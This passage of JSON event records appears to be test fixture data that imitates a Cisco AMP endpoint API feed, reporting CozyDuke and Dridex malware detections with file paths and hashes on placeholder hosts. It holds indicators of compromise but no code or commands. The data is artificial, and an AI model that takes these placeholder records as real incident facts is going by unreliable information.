Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} 